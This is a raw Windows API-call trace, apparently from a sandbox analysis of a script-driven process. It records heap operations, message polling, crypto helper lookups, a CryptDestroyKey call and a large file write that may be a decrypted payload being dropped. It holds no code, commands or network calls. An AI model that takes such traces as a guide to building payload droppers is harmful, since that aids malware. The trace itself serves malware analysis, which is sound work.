[0251.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0251.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0251.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0251.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0251.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0251.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0251.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0251.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0251.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0251.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0251.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0251.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0251.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0251.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0251.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0251.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0251.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0251.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0251.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0251.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0251.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0251.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0251.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0251.501] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0251.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0251.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0251.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0251.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0251.501] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.501] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0251.501] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0251.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0251.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0251.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0251.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0251.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0251.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0251.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0251.503] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0251.503] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0251.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0251.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0251.504] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0251.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0251.504] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0251.504] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0251.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0251.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0251.504] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0251.504] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0251.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0251.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0251.504] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0251.504] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0251.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0251.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e56098 [0251.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0251.505] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0251.505] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0251.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0251.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0251.505] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0251.505] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0251.505] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0251.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0251.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0251.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0251.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0251.514] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0251.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0251.515] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0251.515] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0251.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0251.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0251.515] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0251.517] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f14010*, nNumberOfBytesToWrite=0x11ef8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14010*, lpNumberOfBytesWritten=0x8cf5e4*=0x11ef8, lpOverlapped=0x0) returned 1 [0251.522] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0251.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0251.523] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0251.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0251.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0251.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0251.523] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0251.523] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0251.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0251.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0251.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0251.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0251.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0251.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0251.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0251.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0251.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0251.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0251.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0251.524] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0251.524] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0251.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0251.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0251.524] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0251.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0251.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0251.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0251.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0251.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0251.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0251.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51760, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0251.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0251.525] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0251.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0251.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0251.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0251.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0251.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0251.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0251.526] CryptDestroyKey (hKey=0xa87250) returned 1 [0251.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0251.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0251.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0251.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0251.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0251.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0251.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0251.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0251.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0251.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0251.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0251.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0251.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0251.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0251.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0251.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0251.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0251.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0251.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0251.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0251.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0251.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0251.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0251.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0251.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0251.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0251.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0251.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0251.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0251.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0251.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0251.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0251.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0251.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0251.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e563c8 [0251.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0251.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0251.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0251.642] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0251.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0251.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0251.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0251.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0251.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0251.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0251.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0251.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0251.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0251.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0251.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0251.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0251.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0251.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0251.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0251.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0251.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0251.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0251.643] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0251.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0251.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0251.643] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0251.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0251.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0251.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51328 [0251.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0251.643] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0251.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e56098 [0251.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0251.643] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0251.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56098 | out: hHeap=0x970000) returned 1 [0251.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0251.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51490 [0251.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0251.643] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0251.644] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0251.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0251.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0251.644] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0251.644] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0251.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55df8 | out: hHeap=0x970000) returned 1 [0251.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0251.644] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0251.644] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0251.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0251.645] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0251.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0251.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0251.645] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0251.645] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0251.645] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0251.645] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0251.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0251.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0251.645] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0251.645] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0251.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ae8 | out: hHeap=0x970000) returned 1 [0251.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0251.645] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0251.646] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0251.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 